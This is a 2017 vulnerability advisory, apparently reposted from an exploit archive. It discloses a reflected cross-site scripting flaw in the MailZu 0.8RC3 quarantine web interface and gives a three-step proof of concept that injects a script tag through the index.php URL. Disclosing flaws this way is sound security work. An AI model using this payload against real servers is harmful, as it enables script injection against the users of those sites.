Home / os / winmobile

MailZu 0.8RC3 Cross Site Scripting

Posted on 18 January 2017

[+]################################################################################################### [+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting [+] Credits / Discovery: Nassim Asrir [+] Author Email: wassline@gmail.com [+] Author Company: Henceforth [+]################################################################################################### Vendor: =============== https://sourceforge.net/ Product: =============== 0.8RC3 Download: =========== https://sourceforge.net/projects/mailzu/files/mailzu/ MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages. Vulnerability Type: ====================================== Reflected Cross Site Scripting. CVE Reference: =============== N/A Tested on: =============== Windows 7 Apache/2.4.23 (Win64) Exploit/POC: ============ 1) navigate the server http://server/index.php 2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script> 3) Done! Network Access: =============== Remote Impact: ================= Execute malicious scripts Severity: =========== High Disclosure Timeline: ===================== January 18, 2017 : Public Disclosure

 

TOP